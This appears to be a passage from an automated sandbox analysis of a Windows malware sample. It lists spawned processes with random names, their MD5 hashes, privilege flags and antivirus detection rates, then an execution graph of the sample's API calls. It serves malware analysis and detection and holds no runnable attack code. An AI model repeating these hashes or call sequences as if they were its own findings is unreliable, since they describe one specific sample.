                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\yrzsecpaticodwrc.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:1'040'384 bytes
                                                                                                                                                                                                                                                    MD5 hash:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 97%, ReversingLabs
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                                    Start time:09:39:40
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:1'040'384 bytes
                                                                                                                                                                                                                                                    MD5 hash:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    • Detection: 97%, ReversingLabs
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                                    Start time:09:39:48
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\mjvsikbqngeunkjyurda.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\mjvsikbqngeunkjyurda.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:1'040'384 bytes
                                                                                                                                                                                                                                                    MD5 hash:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                                    Start time:09:39:50
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                                    Start time:09:39:54
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                                    Start time:09:39:56
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                                    Start time:09:39:56
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:1'040'384 bytes
                                                                                                                                                                                                                                                    MD5 hash:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                                    Start time:09:39:57
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                                    Start time:09:39:59
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                                    Start time:09:40:00
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                                    Start time:09:40:01
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                                    Start time:09:40:03
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                                                    Start time:09:40:04
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                                                    Start time:09:40:04
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\yrzsecpaticodwrc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\yrzsecpaticodwrc.exe" .
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:1'040'384 bytes
                                                                                                                                                                                                                                                    MD5 hash:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                                    Start time:09:40:04
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\windows\yrzsecpaticodwrc.exe*."
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                                    Start time:09:40:05
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                                                    Start time:09:40:05
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                                    Start time:09:40:06
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                                    Start time:09:40:07
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                                    Start time:09:40:08
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                                                    Start time:09:40:08
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                                                    Start time:09:40:09
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\takyouhoymc.exe" "c:\users\user\desktop\hqvlyzc7gf.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                                                                    Start time:09:40:10
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                                                                    Start time:09:40:11
                                                                                                                                                                                                                                                    Start date:15/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                                    File size:327'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C2093FBC0B0C6BD085F3AB7056BA31F5
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                      Execution Coverage:3.8%
                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                      Signature Coverage:52.1%
                                                                                                                                                                                                                                                      Total number of Nodes:980
                                                                                                                                                                                                                                                      Total number of Limit Nodes:24
                                                                                                                                                                                                                                                      execution_graph 30460 4269c2 16 API calls 30408 427340 32 API calls 30462 4076c6 118 API calls 30463 41c4c8 72 API calls 30464 4085ca 137 API calls 30410 422d49 GetModuleHandleA GetProcAddress ExitProcess GetCurrentProcess TerminateProcess 30465 4251c9 28 API calls 30467 41edcd 164 API calls 30468 41ebd9 173 API calls 30467->30468 30469 4073ce 108 API calls 30470 425ccd 17 API calls 30413 41c853 149 API calls 30471 41c0d2 52 API calls 30472 41ccd4 82 API calls 30414 420e54 6 API calls 30415 42385a 37 API calls 30416 415b59 59 API calls 30475 4223d8 6 API calls 30476 412fdd 281 API calls 30417 42105f GetWindowTextA EnableWindow 30418 403f74 360 API calls 30477 4091e1 EnumResourceLanguagesA 30419 422261 GetModuleHandleA GetProcAddress 30420 409264 FindResourceA 30480 4283e4 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 30421 406a67 89 API calls 30481 41c7e9 EnterCriticalSection Sleep EnumWindows Sleep LeaveCriticalSection 30482 4291ef 32 API calls 30423 41c66f 74 API calls 30424 405f6f 87 API calls 30484 426cf3 6 API calls 30486 407df4 128 API calls 30487 4156f5 Sleep GetWindowTextA 30425 406b75 17 API calls 30427 405d79 72 API calls 30428 424779 17 API calls 30429 410b01 33 API calls 30431 420f0a 58 API calls 30491 429289 30 API calls 30432 41470d 53 API calls 30492 42108f 157 API calls 30435 415c11 EnumWindows Sleep 30435->30435 29372 422b93 29373 422b9f 29372->29373 29374 422bab GetVersionExA 29373->29374 29375 422bf3 GetModuleHandleA 29374->29375 29376 422be7 29374->29376 29377 422c0f 29375->29377 29376->29375 29417 425b9f HeapCreate 29377->29417 29379 422c60 29380 422c86 29379->29380 29381 422c73 29379->29381 29382 422c6e 29379->29382 29425 425952 29380->29425 29549 4251dd 16 API calls 29381->29549 29548 425354 16 API calls 29382->29548 29385 422c7a 29550 423d5c GetModuleHandleA 29385->29550 29390 422c9f GetCommandLineA 29438 425830 29390->29438 29393 422c9e 29393->29390 29396 422cb9 29397 422cc4 29396->29397 29555 422b6e 16 API calls 29396->29555 29468 42555b 29397->29468 29401 422cd5 29480 423d8c 29401->29480 29405 422cec GetStartupInfoA 29484 4254fe 29405->29484 29408 422ceb 29408->29405 29409 422cfe GetModuleHandleA 29488 40da5b InitializeCriticalSection 29409->29488 29413 422d2e 29558 423ed9 GetModuleHandleA GetProcAddress ExitProcess GetCurrentProcess TerminateProcess 29413->29558 29416 422d33 29418 425be9 29417->29418 29419 425bbf 29417->29419 29418->29379 29420 425bce 29419->29420 29421 425bec 29419->29421 29559 427433 HeapAlloc 29420->29559 29421->29379 29423 425bd8 29423->29421 29424 425bdd HeapDestroy 29423->29424 29424->29418 29560 424f20 29425->29560 29427 422c93 29427->29390 29554 422b6e 16 API calls 29427->29554 29429 4259a1 GetStartupInfoA 29434 425a81 29429->29434 29437 4259bb 29429->29437 29430 425ae8 SetHandleCount 29430->29427 29431 425aa8 GetStdHandle 29433 425ab6 GetFileType 29431->29433 29431->29434 29432 424f20 6 API calls 29432->29437 29433->29434 29434->29430 29434->29431 29435 425a2d 29435->29434 29436 425a4f GetFileType 29435->29436 29436->29435 29437->29432 29437->29434 29437->29435 29439 42586b 29438->29439 29440 42584c GetEnvironmentStringsW 29438->29440 29442 425854 29439->29442 29443 4258fb 29439->29443 29441 425860 GetLastError 29440->29441 29440->29442 29441->29439 29445 425882 GetEnvironmentStringsW 29442->29445 29446 42588a WideCharToMultiByte 29442->29446 29444 425907 GetEnvironmentStrings 29443->29444 29447 422caf 29443->29447 29444->29447 29448 425913 29444->29448 29445->29446 29445->29447 29450 4258f0 FreeEnvironmentStringsW 29446->29450 29451 4258be 29446->29451 29461 42578e 29447->29461 29452 424f20 6 API calls 29448->29452 29450->29447 29453 424f20 6 API calls 29451->29453 29460 42592c 29452->29460 29454 4258c4 29453->29454 29454->29450 29455 4258cd WideCharToMultiByte 29454->29455 29457 4258de 29455->29457 29458 4258e7 29455->29458 29456 425942 FreeEnvironmentStringsA 29456->29447 29568 424e76 HeapFree VirtualFree VirtualFree HeapFree 29457->29568 29458->29450 29460->29456 29462 4257a0 29461->29462 29463 4257a5 GetModuleFileNameA 29461->29463 29569 424db5 53 API calls 29462->29569 29465 4257cd 29463->29465 29466 424f20 6 API calls 29465->29466 29467 4257f8 29466->29467 29467->29396 29469 425568 29468->29469 29471 42556d 29468->29471 29570 424db5 53 API calls 29469->29570 29472 424f20 6 API calls 29471->29472 29475 422cca 29471->29475 29477 42559e 29472->29477 29473 4255e7 29571 424e76 HeapFree VirtualFree VirtualFree HeapFree 29473->29571 29475->29401 29556 422b6e 16 API calls 29475->29556 29476 424f20 6 API calls 29476->29477 29477->29473 29477->29475 29477->29476 29478 42560c 29477->29478 29572 424e76 HeapFree VirtualFree VirtualFree HeapFree 29478->29572 29481 423d95 29480->29481 29483 422cdd 29481->29483 29573 426ce1 14 API calls 29481->29573 29483->29405 29557 422b6e 16 API calls 29483->29557 29485 42550a 29484->29485 29487 42550f 29484->29487 29574 424db5 53 API calls 29485->29574 29487->29409 29495 40da7c 29488->29495 29489 40dac0 SetErrorMode 29575 408d16 29489->29575 29492 40daf4 GetSystemDirectoryA lstrcatA 29584 414bf8 29492->29584 29495->29489 29497 40daa6 29495->29497 30145 413761 51 API calls 29495->30145 30146 413761 51 API calls 29497->30146 29499 40db1d 29593 40d4a9 KiUserCallbackDispatcher 29499->29593 29502 40dab1 29502->29489 29504 40dba3 29601 40c54e 29504->29601 29505 40db79 29505->29504 29508 40db7d 29505->29508 29506 40db2e 29509 40c54e 6 API calls 29506->29509 29511 40c54e 6 API calls 29508->29511 29512 40db36 29509->29512 29516 40db62 29511->29516 29513 40db5b 29512->29513 29514 40db3b 29512->29514 29519 40c54e 6 API calls 29513->29519 29517 40db46 lstrcpyA 29514->29517 29520 40db52 29514->29520 29515 40dbb7 lstrcpyA 29607 40d59d lstrcpyA lstrlenA 29515->29607 29516->29520 29521 40db95 lstrcpyA 29516->29521 29544 40dcab 29516->29544 29517->29520 29519->29516 29628 40a949 29520->29628 29521->29520 29525 40dbf2 12 API calls 29527 40dc70 29525->29527 29528 40dc5a 29525->29528 30028 40d158 29527->30028 29990 40d2ec 29528->29990 29530 40dbdd 29530->29525 29981 413df9 GetModuleHandleA 29530->29981 29987 413dd8 29530->29987 29536 40dc6a 30012 410b43 EnterCriticalSection 29536->30012 29538 40dc7a CreateThread CreateThread 29540 40dca1 29538->29540 29541 40dca6 29538->29541 30312 40c431 29538->30312 30316 40d1d8 29538->30316 30128 410a09 EnterCriticalSection 29540->30128 30131 40c6a0 lstrcpyA lstrlenA 29541->30131 29544->29413 29545 423eb7 29544->29545 30392 423df6 29545->30392 29548->29381 29549->29385 29551 423d81 ExitProcess 29550->29551 29552 423d6b GetProcAddress 29550->29552 29552->29551 29553 423d7b 29552->29553 29553->29551 29554->29393 29555->29397 29556->29401 29557->29408 29558->29416 29559->29423 29563 424ef4 29560->29563 29564 424f1d 29563->29564 29566 424efb 29563->29566 29564->29427 29564->29429 29566->29564 29567 424eae 6 API calls 29566->29567 29567->29566 29568->29458 29569->29463 29570->29471 29571->29475 29572->29475 29573->29483 29574->29487 29576 408d31 